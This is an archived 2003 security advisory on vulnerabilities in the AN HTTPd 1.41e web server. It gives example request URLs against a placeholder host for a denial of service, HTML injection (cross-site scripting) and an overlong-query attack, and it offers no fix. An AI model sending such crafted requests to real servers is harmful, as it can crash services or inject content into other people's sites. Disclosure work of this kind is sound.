5th Jan 2003 [SBWID-5908]
COMMAND
AN HTTPd DoS, CSS, real patch attack
SYSTEMS AFFECTED
AN HTTPd v.1.41e
PROBLEM
In D4rkGr3y of Damage Hacking Group security [http://www.dhgroup.org]
advisory :
(1) real patch attack:
http://www.vuln_host.com/[script]?aaaaaa..[1kb]...aaaaaa
Where [script] - any cgi\batch script.
(2) CSS:
http://www.vuln_host.com/[script]?<h1>HACKED</h1>aaaa..[up_to_1kb]..aaaa
(3) DoS:
http://www.vuln_host.com/aux.cgi?aaaa..[1kb]..aaaa
AN HTTPd will return error "broken pipe" every time, when somebody will
execute any cgi\batch scripts on it.
SOLUTION
?
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
